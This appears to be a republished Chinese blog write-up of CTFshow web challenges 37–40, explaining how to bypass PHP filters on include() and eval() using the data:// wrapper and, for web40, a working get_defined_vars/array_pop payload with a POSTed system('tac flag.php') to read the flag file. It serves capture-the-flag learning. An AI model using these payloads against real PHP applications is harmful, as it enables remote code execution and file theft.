码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • CTFshow web37 38 39 40


    目录

    web37

    代码分析:

    payload:

    ​编辑flag:

    web38

    代码分析:

    payload:

    ​编辑flag:

    web39

    代码分析:

    payload:

    ​编辑flag:

    web40

    代码分析:

    payload:

    flag:


    web37

    代码分析:

    1. if(!preg_match("/flag/i", $c)){
    2. include($c);
    3. echo $flag;
    4. }

    与前几题不同,前几题传入的字符串被eval当作命令执行了,而这道题是include,也就是说应该传入一个文件名,在这里被包含

    但是过滤了flag,传入flag.php是行不通的,这时候可以使用data://text/plain,

    让网页直接包含我们写入的代码,从而执行恶意命令

    payload:

    /?c=data://text/plain,

     注意flag需要绕过,可以使用引号绕过

    flag:

    ctfshow{84e1eca1-f50c-468a-a62d-15e527fa734f} 

    web38

    代码分析:

     if(!preg_match("/flag|php|file/i", $c))

    这一题比上一题多过滤了个php,可以使用通配符绕过

    payload:

    /?c=data://text/plain,

     注意flag需要绕过,可以使用引号绕过

    flag:

    ctfshow{f311f8d8-07a3-473c-bccb-05be9affc617}

    web39

    代码分析:

    1. if(isset($_GET['c'])){
    2. $c = $_GET['c'];
    3. if(!preg_match("/flag/i", $c)){
    4. include($c.".php");
    5. }

     看起来很唬人,我觉得是不是传个flag,其实根本不用管这个.".php",多出来的部分会自动识别为字符串,所以还是跟37一样

    payload:

    /?c=data://text/plain,

     注意flag需要绕过,可以使用引号绕过

    flag:

    ctfshow{78e78020-1ad2-446c-8a13-0cdf5e916bf4}

    web40

    代码分析:

    1. if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
    2. eval($c);

     这道题又回到eval了,但是过滤的内容有点多,翻阅了大佬的题解,发现这里面的括号是中文括号,所以可以使用套娃

    套娃在前面的文章中有详细的操作流程与解释

    传送门

    payload:

    http://7e7c4611-b901-44da-8f62-4a6c54c36e42.challenge.ctf.show/?c=eval(array_pop(next(get_defined_vars())));

    post传一个参数:Chen=system('tac flag.php');

    flag:

    ctfshow{383cbb4b-1fbf-4209-9efb-b64720e53766}

  • 相关阅读:
    day41WEB 攻防-通用漏洞&XML&XXE&无回显&DTD 实体&伪协议&代码审计
    【JAVA程序设计】基于SSH(非maven)便利店管理系统-有文档
    英飞凌TLF35584规格书中文
    C语言 typedef
    C语言:文件操作
    使用sqlcipher打开加密的sqlite方法
    cesium影像推送
    爬取基金收盘价并用pyecharts进行展现
    无病休学什么理由好
    【送书活动1】强势挑战Java,Kotlin杀回TIOBE榜单Top 20!
  • 原文地址:https://blog.csdn.net/qq_40345591/article/details/127755722
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号